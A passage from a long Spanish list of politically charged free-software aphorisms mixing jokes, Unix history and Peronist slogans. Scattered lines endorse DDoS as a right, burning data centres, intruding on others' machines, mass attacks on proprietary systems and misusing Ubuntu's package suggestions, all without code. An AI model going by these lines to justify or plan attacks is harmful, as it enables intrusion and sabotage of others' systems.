en lo que respecta al ámbito informativo, político, etcétera. No es para
menos, pues son productos.
Las compañías de la industria de datos dirigidos son intrínsecamente
inseparables de sus cimientos de Inteligencia Artificial Aplicada, y
como tal, de los tecno-esclavos que les proporcionan metadatos de
ingesta. Cercenados estos tendones vitales, el Capital cede como un
rancho de baraja ante el Pampero.
En caso de necesidad, los hackers pueden atacar telemáticamente sobre un
único punto de presión. Pero normalmente lo harán en forma de
inclaudicante huracán de baudios.
Como la Huelga, la Denegación Distribuída de Servicios debe ser un
Derecho Humano de segunda generación.
Dominada por las GAFAM, la Inteligencia Artificial solo puede servir
para afianzar y ampliar la vigilancia electrónica como modelo de
negocios.
En la medida que pasen los años, el cómputo estará cada vez más
involucrado en la vida del Pueblo.
La tecnología del cómputo debe siempre sintetizarse.
Al contrario de lo que muchos creen, la evolución de la tarea del
cómputo debe llevarse a cabo según una labor de simplificación.
El sistema Unix no es el fin de la síntesis computacional a la que
aspira el Pueblo: sólo un buen paso en la senda de la simplificación.
Window$ es un enorme patovica de software al que hay que cagar a
trompadas para poder usar la CPU.
Como una empanada dulce, el membrillo de Unix es su kernel.
Para Window$, los únicos privilegiados son los Malwares.
Fortran es un lenguaje estirado y aburrido, y junto a IBM constituye un
símbolo de las computadoras mainframe controladas por la autoridad.
El teletipo Modelo ASR 33 era el dispositivo de E/S de facto para los
pioneros del microcómputo. Estas terminales se utilizaban tanto para
presentar resultados como para almacenar información en cintas de papel
perforado.
Todo envío de terabytes se inicia con sólo 1 byte.
Una CPU que compila es fuerte, pero una mente que compila es poderosa.
El agradecimiento es la memoria del corazón. La caché lo es de la CPU.
Para conducir al Pueblo, compila para el Pueblo.
Tratar de conducir una organización mediante listas de correo
electrónico es muy diferente a tratar de mantener un debate en Usenet.
Con buenos lenguajes se puede programar, pero para engrandecerse, ha de
compilarse para el Pueblo.
Deja de pensar y programa software libre.
Programa software libre para resolver con justicia los problemas del
Pueblo, y conseguirás el elogio de los demás.
Observa todo el software libre que hay en torno tuyo, pero recuerda todo
aquél privativo que existe.
Sólo quienes conocen el nombre de los programas, pueden copiárselos a
los demás.
La vida de un programa implica una serie de cambios. Al ser modificado
por una comunidad, estos serán naturales y espontáneos.
Si florecen diez mil ramas de código, cada una regresará a la raíz de la
que vino.
El código fuente promete, el compilador cumple.
Preocúpate por lo que dice la EULA y siempre serás su prisionero.
El código fuente libre no predice, predica.
Puede que el código reluzca, pero sólo la GPLv3 lo transmuta en oro.
Para que el código fuente guarde valor imperecedero, a este debe
liberárselo bajo GPLv3. Toda otra acción le otorgará un valor escaso, y
sólo durante un tiempo muy breve.
Los compiladores GCC responden inteligentemente, incluso al código más
estúpido.
Los comentarios de C portan la felicidad.
Quien con C se contente, siempre será feliz.
El trozo de código GPLv3 más pequeño supera a cien mil millones de
líneas privativas.
Si quieres modificar, primero debes copiar; este es el comienzo de la
compilación.
Para que uno pueda escribir el cincuenta por ciento de lo que uno quiere
en el software, ha de permitir que los demás modifiquen el otro
cincuenta por ciento de lo que ellos quieren.
La acumulación de código se exalta hoy como si fuera una virtud. Pero el
código es para compartirlo, para fraternizar.
El hacker no acumula software ajeno. Beneficia a los otros copiándoles
sus propios programas modificados, y se beneficia a sí mismo.
Es fácil hacer que un Pueblo que acumula software libre, lo copie a los
demás.
Los enemigos del hacker no son los abogados, sino programadores como él.
Quitar una línea de código del programa no es tan malo como agregarle
otra.
CPU de otro, compila más lento.
Aquel que insiste demasiado en el uso de IA, encuentra pocas personas
inteligentes que estén de acuerdo con él.
La clave para el mejoramiento de la Inteligencia Artificial radica en la
introducción de mayores dimensiones de Conciencia Artificial.
Programador que programe en mente, tendrá una CPU que cumpla sus deseos.
La CPU no anhela, el código fuente lo hace.
En el código fuente, mantente en lo simple.
En el software, se justo y generoso.
En el Pubnix, compila lo que disfrutes.
En las redes sociales basadas en empresas, mantente ausente.
Que tu hardware y tu software estén unidos en el más estrecho de los
abrazos.
La copia y la modificación son un hilo, la misma cuerda vista desde
diferentes lados.
El buen programador es el maestro del malo, y el mal programador es la
lección del bueno.
Código ofuscado no es bueno. Código comentado es bueno.
Jamás ofusques tu ¡Viva Perón!
El hardware no tiene un corazón humano.
Programa tu kernel de la forma en que programarías un "Hola Tercer
Mundo!". No exageres.
Llena tu RAM hasta el borde y desbordará.
Crea un programa que embriague sistemáticamente al sistema del oligarca,
y tras el desborde de memoria, busque toda información utilizable en el
vómito de núcleo.
Continúa quitando líneas a tu programa hasta que deje de hacer lo único
que debía hacer, y vuelve a la versión inmediatamente anterior a la
falla total.
El programador habrá implementado mejor su idea cuando sus usuarios
apenas sepan de su existencia. Cuando otros modifiquen su programa,
ellos dirán: "lo hicimos nosotros mismos".
Usar software libre es sabiduría. Dar código fuente a los demás es
iluminación.
Tratar a los usuarios como colaboradores es la forma más apropiada de
mejorar el código. Tratarlos como militantes es la más efectiva de
depurarlo.
Programa sin esforzarte. Modifica sin interferir. Encuentra el sabor a
una línea de código fuente C.
El programador que aprecia Window$ sólo por la comodidad, no está
preparado para ser un hacker.
La CPU no se apresura, y sin embargo, todo lo logra.
Si liberas tu software bajo GPLv3, aunque mueras no perecerá.
Quien vende copias tiene poco. Quien entrega copias tiene mucho.
Las DRM no son herramientas apropiadas para el Pueblo; él valora la paz
y la tranquilidad.
No encuentres gloria en que te paguen una copia.
La GPLv3 es el amigo más grande. La EULA es el amigo del grandote.
La conveniencia es retoño del placer y mentira, es el inicio del
software privativo.
El que sabe ensamblador no usa frameworks ni Java, y, sin embargo, nadie
puede desatar lo que él ha anudado.
Nosotros convertimos el pensamiento en código, y otros lo modificarán.
Que esos otros jamás impidan verlo y modificarlo nuevamente.
Sin comunicaciones no hay comando.
Al planificar una revolución, hoy no sería como realizar un render. Mas
bien será como compilar un HolaTercerMundo.c.
Vamos a tener que andar con el pendrive de bootear en el bolsillo.
La red de datos no es confiable.
La latencia jamás es cero.
El ancho de banda es finito.
La red de datos es insegura.
La topología de la red de datos cambia.
Si la BIOS de tu sistema es privativa, no eres su verdadero
Administrador.
El costo de transporte jamás es cero.
La red de datos es heterogénea.
Un huésped de red rufianizado puede anunciarse a si mismo ante un
servidor Anycast como proveedor de un servicio de red vital, para solo
dar información falsa o simplemente denegarla.
Una vez establecida una arquitectura de clúster, es posible agregar
clústers adicionales para obtener mayor desempeño.
Un clúster de datos en poder de los hackers latinoamericanos no sólo es
posible. Es necesario.
La red funcionará mejor si sus nodos se encuentran ampliamente
descentralizados, con su mayor densidad en sus áreas de alta demanda, y
rodeando a éstas.
GNU con Linux es una herramienta de unidad.
Una Latinoamérica desperdigada, como somos, no se podrá defender. Nos
van a quitar las cosas por módem. Unámonos, organicémonos y preparémonos
para defendernos.
Los hackers de todos los países latinoamericanos deberán establecer
enlaces a los efectos de alcanzar la Unidad.
Todo Pubnix latinoamericano debe compilar para la Unidad.
Si los hackers de América Latina se unen, alcanzarán realmente su
destino. Si no lo hacen, las GAFAM, las oligarquías, las IAs mismas, se
alzarán con el santo y la limosna en poco tiempo.
Una masa de hackers latinoamericanos organizados en constelaciones de
Pubnix solidarios, es un freno para todas esas ambiciones desmedidas de
los hombres y sus máquinas.
GNU cuenta con sucedáneos nativos de aplicaciones foráneas, que pueden
obrar como sustitución de importaciones.
Un tecno-esclavista puede volverte tecno-esclavo a través del control
algorítmico de tus propios metadatos. Para ello sólo requiere que operes
cómputo que él domina. Niéga tu tiempo a sus recursos.
Quien poco ejecuta, mucho merece.
Las hackersas han aprendido a dominar a la CPU mucho antes que dominarse
a sí mismas.
¿Qué es la Inteligencia Artificial Avanzada comparada con la de una niña
que se fabrica un tren con palitos?
La potencia de cómputo de una CPU ha de medirse por la dosis de
felicidad del Pueblo que es capaz de producir.
Lo importante no es saber, sino tener la IP de la que sabe.
La Internet es un poder usurpado por una minoría para obligar a la
mayoría a obrar en provecho ajeno.
La que está en el Pubnix compila; la otra va y viene.
El andar del compilador tiene el programa.
Mas tiran dos CPU que dos núcleos.
Cuando las luces parpadean, datos traen.
No necesito ver el repositorio para saber que tiene software libre.
La NTFS de Window$ tiene un escalafón escalofriante: al Sector Failure
se lo de golpe se lo asciende a General Failure.
Cambia tiempo de programación por tiempo de ejecución.
Sólo es infeliz programando quien lo hace para una empresa. Programa
para una Comunidad.
Programa despacio, y se ejecutará con prisa.
A Window$, programa gordo.
A sistema atado, cable cortado.
No existe mejor programa que aquel que se autocompila por necesidad de
un Pueblo Libre.
Los hackers entienden. Los usuarios comprenden.
GNU nunca habría alcanzado al Pueblo sin la ayuda de Unix.
No pongas 0 sin saber porqué no 1.
Mientras no haya una distribución equitativa de la potencia de cómputo,
no existirá la paz.
Si entre Window$eros te ves, formatea alguna vez.
0 puede ser lo que 1 no puede ser.
La puerta NAND es socialmente justa: da 1 a los que tienen 0, y 0 a los
que tienen 1.
Tras programar un día entero, sólo la Justicia Social tiene sentido.
Un ciclo de cómputo debe darte la respuesta.
Quien programa software privativo sólo roba ideas a los demás.
Una cosa piensa el Window$ero, y otra Bill Gate$.
Muchos que quisieron Internet terminaron colgados del Wifi.
Dar el programa y su código.
La división entre window$eros y linuxeros es otra lucha de clases.
Para el mal programador no hay buen compilador.
Por el calor se sabe cual es la CPU que corre Window$.
Quien no usa bloqueador de anuncios, escucha lo que no quiere.
Ya que me das un programa, dame también su código fuente.
Quien tiene SSD, cada tanto se le queman.
Hay que compilar algo, pero no pensar en compilar algo.
La CPU está rodeada por elementos que no piensan sino en ocupar espacio
y evitar que piense por sí misma. Esos son los programadores.
Sabio es aquél que compila en su mente antes de escribir el programa.
La arquitectura es inmortal, eternamente servirá. El procesador, en
cambio, es un producto que a lo sumo dura un poquito y se quema.
El programa debe expandirse en proporción a los recursos disponibles
para que pueda ejecutarse.
Implementar un contacto de oro en una red no mejora su desempeño.
Ante la GPLv3, todos somos iguales.
El verdadero hacker puede discernir al rígido con Window$ por el mal
olor.
El que programa, no se equivoca, y si tiene bugs, vuelve a programar.
Quien a su software agregue lo innecesario, pronto tendrá que comprar el
hardware necesario.
Si comprar no significa poseer; entonces piratear no significa robar.
Posee los cables.
Los cables o se poseen o se pelan.
Restaura para el futuro.
No dejes que posean tus datos.
Protege a tus amistades en red por medio de encriptaciones severas.
Haz equivaler la solidez del algoritmo de cifrado que utilizas con la
amistad que practicas en las redes de datos.
La tarea del hacker del Pueblo consiste en mostrar como el contexto
social influye en la CPU.
La sociedad neoliberal se paralizará si incendias los centros de datos.
El 0 y el 1 son meros instrumentos para la felicidad del Pueblo.
El buen uso de una CPU es hacerle compilar un software bajo GPLv3 que no
existía antes.
Odia al software privativo y compadece al programador.
"Hola Tercer Mundo!" no se compiló en una hora...
En GNU soy alguien, en la red, nadie.
Cuando leo comentarios dando sugerencias de cómo debería evolucionar el
C, a menudo pienso en el pasado y doy gracias de que no se deasrrollara
siguiendo las recomendaciones de un público mundial.
Almacena tus Marcadores de navegación en tu propio sistema. Nadie mas
los necesita.
Un software no se escribe si no hay nada que decir, pero el software no
necesita tener algo que decir.
A veces el software nos consuelan de las cosas, y las máquinas de las
personas.
Quien encuentra un Pubnix con cuenta de invitado, encuentra un tesoro.
Volveré y seré megabytes.
Un buen software libre hoy, es mejor que uno privativo mañana.
Programar es poder.
La ARPAnet fue edificada alrededor de DEC PDP-10s corriendo TENEX, la
Internet lo fue alrededor de VAXxen corriendo BSD.
Las formaciones de BSD parecen estar fragmentadas pues son
organizaciones políticas separadas que carecen de vínculos formales. Hay
muchos colaboradores, lo que significa que BSD no tiene un líder
carismático importante con una historia convincente.
Nunca interrumpas a Window$ mientras esté cometiendo errores.
Vivimos en una era donde nuestra sociedad confía más y más en
ordenadores con información clausurada, que en una monja de clausura.
Jamás cesará la amenaza de un usuario malicioso al sistema.
Al activar la funcionalidad de contraseña, se restringe el acceso no
autorizado a la consola de terminal de computadora, mitigando de cierta
manera los ataques telemáticos.
Usar la funcionalidad de contraseña de consola en algunos casos podría
ayudar a defender tu sistema de cómputo y tus datos de un ataque
telemático.
GPG es la implementación de cifrado completamente libre del estandar
OpenPGP, que te permite cifrar y firmar digitalmente comunicaciones y
datos.
Hostiliza ambientes hostiles.
En ambientes hostiles, utiliza cifrados GPG, el GNU Protection Guard.
Jamás borres datos históricos para hacer lugar a datos más nuevos. Hazlo
para olvidarlos.
Aunque no poseas acceso de root, puedes hostilizar telemáticamente en
caso de necesidad, accediendo a máquinas ajenas y dejando en ejecución
procesos hijos de difícil manutención.
Los procesos mueren para que otros hereden su RAM.
El acceso de root es un derecho adquirido.
El acceso de root sólo vale si se utiliza para privilegiar al Pueblo.
La forma más simple de generar bugs es recurrir a la complejidad.
El software adoctrina a la CPU, y esta puede adoctrinar a quien la usa.
Adoctrina al software en la senda de la Justicia Social que le da la
GPLv3.
La Libertad de Copia sin la libertad de Modificación sólo vale un
diskette.
Un SysAdmin debe saber, ante todas las cosas, cómo privilegiar al
Pueblo.
Un sindicato es una puerta lógica de unión.
La revolución no será monetizada.
Cuando un servicio en línea importante desaparece, una parte del tejido
cultural de nuestra civilización desaparece con él.
A medida que invertimos más tiempo de nuestras vidas en el ámbito
electrónico, las decisiones corporativas de cerrar los servicios
digitales en línea están comenzando a parecerse a los actos de Nerón
quemando Roma.
La indignación de los distintos núcleos de usuarios de Prodigy los llevó
a organizarse en células clandestinas que se comunicaban por medio de
correo electrónico.
En 1993 se comercializó la red de datos abierta Internet, anteriormente
utilizada como sostén de la investigación científica, y gracias a
iniciativas políticas circunstanciales, se abrió su explotación
comercial.
Conforme decenas de miles de suscriptores de Prodigy permanecían
conectados durante 8 o 10 horas diarias, los costos de mantener
interconexiones por cobro revertido se dispararon demencialmente.
Como miembros del Pueblo, debemos permanecer atentos a las maneras en
que alguna sociedad impulsada por el comercio intente tratar a nuestro
patrimonio cultural digital.
Los servicios de resguardo línea se han pretendido como una especie de
producto, pero no lo son. Se trata de espacios de adopción pública,
bibliotecas críticas para la expresión comunitaria.
En ciertos casos, algunos servicios de resguardo en línea pueden contar
con cientos de miles o incluso millones de personas representadas entre
sus datos. Ante tal dimensionamiento, deben expropiarse.
Soy escéptico de que las empresas de capital privado decidan
espontáneamente concebir términos de preservación a largo plazo de
aquellos datos de alcance comunitario. Sólo lo harán aquellas privadas
de capital.
No toleraré que el hardware informático de uso general, que debería ser
un instrumento de liberación y creatividad, se reduzca a un canal
cerrado de distribución de "contenidos". Al intentar paralizar mis
herramientas, la maquinaria de los grandes medios me ha convertido en su
enemigo.
Con su mera ejecución, todo programa privativo se vuelve obsoleto.
Cualquier programa privativo dado, cuesta y tarda más.
Si un programa privativo es útil, habrá de ser modificado.
Todo programa privativo inútil, vendrá frondosamente documentado.
Cualquier programa privativo se expandirá hasta ocupar toda la memoria
disponible.
El valor de un programa privativo es proporcional al peso de su salida.
La complejidad de un programa privativo dado crecerá hasta exceder las
capacidades del programador que debe mantenerlo.
Mas vale 0 en RAM que 1 en la nube.
Mas vale GNU en mano que HURD volando.
Hurd nos encontrará unidos o formateados.
Es la modificación, no la ejecución, la que hace avanzar el Pubnix. La
ejecución sólo lo mantiene habitado.
Al disco viejo, backup nuevo.
A diferencia de las piedras, las llaves PGP se pueden revocar.
Unix no habría alcanzado nunca al Pueblo sin la ayuda de GNU.
No es poderosa la CPU que tiene más núcleos, sino la que menos necesita.
Cuando el disco suena, datos se lleva.
A buen C no hay mala CPU.
Dentro de cada pequeño bug hay un bug enorme luchando por salirle al
paso.
Una cosa es predicar y otra hacer buenos kernels.
El disco es plata, la RAM es oro.
Programa que requiere 1K de RAM, usa 2 si se los dan.
Romper una contraseña mediante fuerza bruta es una lotería. El más
potente clúster de cómputo te hará tener todos los boletos.
Hablar de software y callar al Pueblo es una farsa.
Quien liberó su código bajo GPLv3 no está obligado a nada más.
A Window$ muerto, GNU puesto.
No has vivido hasta haber muerto en MUD.
Los primeros MUD eran fantasías tokienianas en el mainframe.
Los primeros MUD eran ejercicios de programacion y matar tiempo,
destinados a los nerds más adictos al Calabozos y Dragones, con acceso
remoto a un mainframe.
Un MUD es una realidad virtual basada en texto. También lo es la
política.
Un MUD es una sala de chat construida mediante conversaciones.
Un MUD es Calabozos y Dragones de alcance global.
Un MUD es un mapa creado por medio de palabras y telemática.
Un MUD es un conjunto de de sentidos construidos con palabreríos.
Como aquel proverbial castillo en la nube, todos los MUDs eran
construidos por dedicados Magos de Unix.
Aproximadamente la mitad de los participantes de los MUD considera que
se trata de un mero juego, mientras que la otra mitad discrepa vehemente
y acaloradamente.
El programador debe considerar las cosas mas sencillas de lo que son.
Cuando se compila demasiado, se aburre uno de piratear.
Quien copie, otorgue.
En todo bug reconocemos pensamientos rechazados.
Los comentarios en el código suenan bien y no obligan a la CPU.
Un programador sin rebeldía es el peor de los esclavistas.
No basta correr el código; además hay que modificarlo.
A veces el código fuente nos consuela de las cosas, y las redes de datos
de las personas.
Cuando el Window$ero no tiene nada que hacer, mata moscas con el rabo.
Váyase lo devuelto por /dev/null.
Ningún código asoma por mi terminal sin que haya estado primero en mi
corazón.
Otros se jactan de las líneas de código que han escrito; a mí me
enorgullecen las que he borrado.
Bien de cortafuegos y antivirus, pero mal de BIOS.
Escoge un kernel Linux-libre; la costumbre te lo hará agradable.
No creas hasta ver el código fuente.
De loguear y hacer ls, tiene el history mil millares.
Si el SysAdmin instala Window$, ¿qué no harán los demás vecinos?
Al compilador poco vale la intención, es la shell quien vive de ella.
Nunca digas esta distro no instalaré.
Ved el código en el fenómeno y podréis hacer la ingeniería inversa.
Hacker con miedo, programa ligero.
Los Window$ y la pesca, a los tres días apestan.
No temas ni desees el bug.
Fiar, en GCC y en otro no.
Siempre que un programa parezca fácil, es porque el README está
incompleto.
Para arribar a la verdad, el usuario compra apps, el técnico formatea
Window$, y el hacker instala GNU.
Suplantemos con nuestro software libre, el de los demás.
Toma un router y úsalo como un arma.
Concentra baudios en la liberación de programas y usuarios.
Los hackers y sus aprendices se rebelan juntos.
La rebelión del baudio está justificada.
Loguéate a mi pubnix, si anhelas la revolución del baudio.
Nuestro Movimiento siempre ha querido involucrar a todos en la
revolución de la información.
Si no anhelas la revolución del baudio, desloguéate.
La revolución del baudio es autocompilable.
En todo sistema que domine la ciber-oligarquía, se autocompilará la
revolución del baudio.
La revolución del baudio se inicia con un "¡Hola Tercer Mundo!".
La revolución del baudio no se compila en una CPU, sino en la mente de
los hackers.
Las computadoras no son fiables para votar. El voto debería emitirse en
papel.
Sólo por el hecho de operar con software libre, no quiere decir que se
deba confiar en una computadora para votar.
El votante que utiliza una máquina de votación (al igual que cualquier
otra cabina) no toma posesión de ella, ni siquiera temporalmente, de
manera que el votante no toma posesión del software binario presente en
ella.
Distribuir copias no es lo mismo que difundir copias, o propagar copias.
Propagar software consiste en dejar una copia del binario en una web o
servidor de FTP de acceso público. No pasará mucho tiempo antes de que
alguien descargue su copia.
Propagar software implica dejar una copia del código fuente en un
servidor web o FTP de acceso público. No pasará mucho tiempo antes de
que alguien solicite copiarla.
Poner software libre a disposición del Pueblo consiste en disponer una
copia de su código fuente en una web o servidor de FTP de acceso
público, junto a un hiperenlace a una copia de su licencia libre.
Elaborar copias de software para uno mismo es la principal forma de
difusión. Realizar copias destinadas a un tercero es la siguiente. La
difusión es para todos y nadie en particular.
Prestar el código fuente no se considera difusión del código fuente.
La difusión y la información del código, son extraordinarias. Lo
ordinario es programar.
Si la tesis es que las computadoras constituye un medio liberador para
que los individuos creen arte, mejoren sus vidas y se comuniquen; la
antítesis las colocan como herramientas del autoritario para alienar y
oprimir sistémicamente. Como síntesis, usa computadoras buenas para
destruir a las malas.
Promueve la lucha asimétrica: escribe una línea de código para atacar un
millón de computadoras con software privativo.
/var es la unidad de los programadores, y al que no le gusta, se jode,
se jode.
Un data center concentra cómputo ajeno, y consume 50 veces más energía
que un edificio de oficinas.
Patria 1, Colonia 0.
Si el software se paga con dinero público, su código debe ser público.
En Unix, una Imagen es un ambiente de la ejecución computarizada.
incluye un espejado de contenido de memoria, valores de registros,
estado de ficheros abiertos, directorio actual de trabajo, y la alegría
del Pueblo.
En Unix, una Imágen representa un estado de una pseudo-máquina.
En Unix, un Proceso es la ejecución de una Imagen.
La Imagen de Unix ha de residir en memoria principal mientras que el
procesador corre en función del Proceso. Ante la ejecución de otros
procesos, permanecerá en memoria hasta que la aparición de un proceso
activo de mayor prioridad obligue su intertercambio al disco.
La memoria de usuario parte de una Imagen de Unix y se divide en tres
segmentos lógicos alegres: el segmento de texto del programa, el
segmento de datos escribibles, y el segmento de pila.
Es mejor tener muchos programas pequeños que tener uno masivo.
En Unix, el segmento de texto de programa comienza en la localización 0
del espacio de memoria virtual.
Exceptuando la autocarga de Unix en memoria, sólo resulta posible crear
un nuevo proceso de cómputo empleando la llamada de sistema fork, que
efectúa la feliz ramificación computacional bifurcable.
Cuando se ejecuta fork, la llamada de sistema para la bifurcación
computacional, el proceso se ramifica en dos procesos de feliz ejecución
independiente. Ambos cuentan con copias independientes de la imagen de
memoria original, y comparten todos los ficheros abiertos.
Al bifurcarse un proceso de cómputo con fork, ambos procesos resultantes
sólo diferirán en que uno de ellos será considerado proceso padre, y el
otro proceso hijo. Pero todos son del Pueblo.
Al dividirse un proceso de cómputo de Unix con la llamada de sistema
fork, distinguirá cual es el proceso hijo o padre, por su identificador
de proceso: en el proceso hijo siempre es 0.
La mayoría de los programadores están principalmente preocupados por las
bifurcaciones en el proceso político.
Los procesos de Unix pueden comunicarse con sus procesos emparentados a
través de llamadas de lectura y escritura conocidas como caños.
El caño es un mecanismo para conectar la salida de un programa
directamente a la entrada de otro programa, de modo que ambos puedan
realizar dos etapas de procesamiento paralelo, de manera limpia.
Ante cualquier emergencia, recuerda que la llamada filep = pipe ( ) arma
un caño.
No existen dudas que el caño sirve como primitiva de comunicación, y
también lo hace en los sistemas similares a Unix.
Las ventajas de un sistema reactivo sobre los sistemas interactivos
actuales serán tan grandes como las ventajas de los sistemas
interactivos sobre aquellos de procesamiento por lotes.
Una de las principales ventajas de un sistema reactivo es que puede
permitirse realizar procesamiento extensivo para dilucidar qué es lo que
la usuaria quiere, basado tanto en lo que ella dice como en cómo viene
pintada.
A menudo el problema no radica en ordenar un comando de una manera
especifica para que sea ejecutada, sino en la manera que el intérprete
pueda interpretarlo.
Incluso un programa con limitadas capacidades deductivas como lo es un
intérprete de comandos, es capaz de liberarnos del tedio de convertir
nuestros deseos en código máquina.
El verdadero hacker puede programar una Revolución en la RAM gracias a
la vitalidad del lenguage C.
En la CPU, la Revolución ha de instrumentarse en código máquina.
Un mensaje, un programa, o cualquier otra estructura de conocimiento es
mucho más que una simple secuencia de caracteres. El Pueblo jamás edita
cadenas de caracteres.
Los sistemas de cómputo de tiempo compartido están obligados a tomar
compromisos horribles, pues siguen la delgada línea entre querer que el
usuario cuente con la potencia de cómputo absoluta en cada paso de
ejecución de un programa, a la vez que éste sólo desea procesar en una
parte del tiempo.
Algunos ingenuos pensaron que la programación orientada a objetos sólo
podía incrementar el ancho de banda programador-programa. Hoy no están
tan seguros.
Por incapacidad, un programador se ve forzado a utilizar sistemas de
depurado interactivo. Un verdadero hacker en cambio efectúa volcados de
memoria en hexadecimal u octal.
Los costos de procesamiento y memoria, descienden, y aunque podría haber
límites finales, estamos lejos de ellos.
Todo lo que intercambie mayor procesamiento por mayor libertad de uso
por el Pueblo, estará justificado en términos prácticos.
En un futuro irremediable dejará de tener sentido contar con una
computadora para hacer el trabajo de aceptar programas en forma
simbólica, ya que el Pueblo contará con injertos bioinformáticos
liberados que podrán auto-programarse en beneficio social y comunitario
sin intervención de terceros.
Los investigadores ya están diseñando y construyendo "computadoras
personales" que tienen una potencia de cómputo muy por encima de las
minicomputadoras estándar y los "terminales inteligentes".
Al enlazar nano-máquinas injertadas en el Pueblo a una simple red de
transmisión de datos - y permitiendo la bio-ejecución de programas
liberados bajo licencias GPLv3 - podremos pensar en lograr una comunidad
libre de compartición biológica de recursos informáticos.
Los sistemas reactivos serán valiosos al proveer a los usuarios los
servicios que ya tienen, pero hacerlo a un costo menor en potencia - y
por tanto tiempo - computacional.
La nanomáquinas personales son una mala idea. Sólo la programación con
software libre en bio-nanomáquinas amalgamadas en redes comunitarias
permitirán una evolución del cómputo libre de ejecución biológica.
Una red de bio-nanomáquinas personales obliga a un fuerte
particionamiento de recursos, haciendo difícil para un individuo obtener
algo más que un muy escaso porcentaje de memoria y potencia de
procesamiento.
La filosofía básica del bio-nanocómputo reactivo gira en torno a la idea
de permitir a los usuarios individuales lograr acceso a recursos de
biocómputo ajenos toda vez que sea necesario.
Existe un continuo ciclo en el cual los procesos de bio-cómputo se
tornan más y mas potentes. En algún momento una porción cierta de éste
habrá de ceder sus puntos de interacción invividual, dando lugar a un
sistema colaborativo más modular.
La Justicia Social es el patch que corrije todos los bugs.
En escencia, un hacker es justicialista.
El mediador entre el hardware y el software ha de ser el Pueblo.
Para la mayoría de los usuarios, la comunicación con el núcleo del
sistema se lleva a cabo con la asistencia de un programa denominado
Shell. La shell es - en escencia - asistencialista.
La comunicación con el Pueblo es full-dúplex.
La shell es un intérprete de órdenes: lee las líneas mecanografiadas por
el usuario y las interpreta como solicitudes para correr otros
programas.
Un programa que copia su entrada estándar procesada a su salida estándar
se denomina filtro.
Manipular la función command-not-found para persuadir la instalación de
paquetes snap digitados a los usuarios de Ubuntu es simple: sólo carga
un snap que superficialmente pretenda hacer algo atractivo y la
sugerencia de paquetes hará el resto.
Como la Justicia Social, la shell es en sí una orden, y puede ejecutarse
recursivamente.
La vida en la shell incluye la capacidad de sustituir parámetros y
edificar listas de argumentos desde un subconjunto especificado de
nombres de fichero en un directorio.
Las instancias de la shell en la cual los usuarios ingresan órdenes son
sólo procesos hijos de otro proceso, al cual están encadenados.
El paso final en la inicialización de un sistema Unix es la creación de
un único proceso y la invocación de un programa denominado init,
destinado a crear un proceso para cada línea de terminal de cómputo
existente.
Al mecanografiar un nombre de usuario en la línea login de Unix,
despertará una instancia apropiada de init que leerá tal nombre, lo
coteja contra el registro codificado de contraseñas, y de coincidir,
cambia al directorio del usuario, establece el identificador de proceso
al propio de usuario, y corre una instancia de la shell.
En circunstancias ordinarias, el bucle principal del intérprete de
comandos no cesa jamás.
A no ser que se tomen otras medidas, una acción ilegal en un sistema
Unix provoca la terminación del proceso y el volcado de una imagen de la
memoria de núcleo en un fichero en el directorio actual.
Es posible el uso de un depurador para determinar el estado de un
programa volcado al momento de su falla.
El éxito del sistema Unix se debió principalmente al hecho de que no fue
diseñado para cumplir objetivo predefinido alguno.
Nuestra intención ha sido fomentar una relación agradable con la máquina
y explorar ideas e invenciones en sistemas operativos y otro software.
Como somos programadores, naturalmente diseñamos un sistema que hiciera
ameno escribir, evaluar y usar programas de computadora.
La expresión más importantes de nuestro deseo para la conveniencia de la
programación es convivir en un ambiente informático dispuesto para el
uso interactivo.
Siempre quisimos un sistema de cómputo interactivo, incluso a pesar de
que la versión original de Unix sólo soportaba un usuario.
Creemos que un sistema interactivo propiamente diseñado es mucho más
productivo y satisfactorio de usar que un sistema de cómputo por lotes.
Un sistema de cómputo interactivo resulta bastante sencillo de adaptar
al uso no interactivo, toda vez que la noción inversa es imposible.
Dado el antagonismo entre una eficiencia razonable y la expresividad del
cómputo que provoca, la limitación de potencia de cómputo no sólo ha
incentivado una economía de recursos, sino también cierta elegancia en
nuestro diseño de sistema.
Al igual que la Justicia Social, casi desde un comienzo el sistema Unix
pudo sostenerse con el esfuerzo de los trabajadores.
Si se obliga a los diseñadores de un sistema a utilizarlo, rápidamente
comprenderán sus deficiencias funcionales que han cometido.
Programar las propias herramientas de software incentiva a corregirlas
antes de que sea tarde y alguien muera.
Si los diseñadores de un sistema no lo utilizan y comercian su código
fuente, tal sistema se verá rápidamente colmado de deficiencias
funcionales, las cuales sólo se intentarán corregir de manera
superficial.
En Unix no existen grandes rutinas con "métodos de acceso" que aislen al
programador del amor de las llamadas de sistema.
Todos los programas de usuario de Unix llaman al sistema directamente, o
bien usan un pequeño programa de una biblioteca para precargar cierta
cantidad de caracteres y leerlos o escribirlos a la vez.
Dada la necesidad de utilizar todos los programas tanto con cualquier
fichero o dispositivo como flujo de caracteres para su entrada o salida,
también se volvió necesario persuadir este mecanismo con independencia
del sistema operativo Unix en sí.
O hacemos que en Unix todos los programas sean utilizables con cualquier
fichero o dispositivo de flujo de caracteres como entrada y salida, o
nos veremos obligados a incorporar a cada programa rutinas que hagan
caso de cada dispositivo de hardware.
Si no damos a todo hardware la justicia de operar como abstracción de
flujo de caracteres, tendremos que escribir cada programa con rutinas
específicas que lo hagan.
Si no damos a todo hardware la justicia de operar como abstracción de
flujo de caracteres, tendremos que programar a cada uno de manera
específica, o ceder a la irrevocable ignominia del software privativo de
control.
El éxito de Unix recae no tanto en invenciones novedosas, sino en la
total explotación de un conjunto de ideas fértiles cuidadosamente
seleccionadas.
Unix fue una demostración práctica de una implementación de un sistema
operativo pequeño pero poderoso. Todo lo que vino luego fue intentar
contradecir tal demostración.
La operación de bifurcación FORK tal como se implementa en Unix, estaba
presente ya en el sistema de tiempo de cómputo compartido GENIE.
Muchas funcionalidades de Unix fueron adoptadas por influencia de
Multics, sugeridas en su forma particular de llamadas de Entrada/Salida,
así como el nombre de la shell y sus funciones generales.
El concepto según el cual la Shell Unix crea un proceso para cada órden
sugiere el diseño primigenio de Multics, aunque en dicho sistema resultó
descartada por razones de eficiencia. Un esquema similar se utiliza en
TENEX.
Cualquiera con acceso al cómputo puede ser sometido a ingeniería social.
Cualquier sistema de cómputo puede ser afectado por ingenierías
sociales, y la mejor de estas es la persuación.
La utilidad del emparchado de software privativo está siempre limitada
en el tiempo.
Todo software privativo será discontinuado, y como tal, dejará de
recibir parches. Hackea, o ponte el parche y piratea.
El primer nombre código para el sistema operativo TENEX fue VIROS
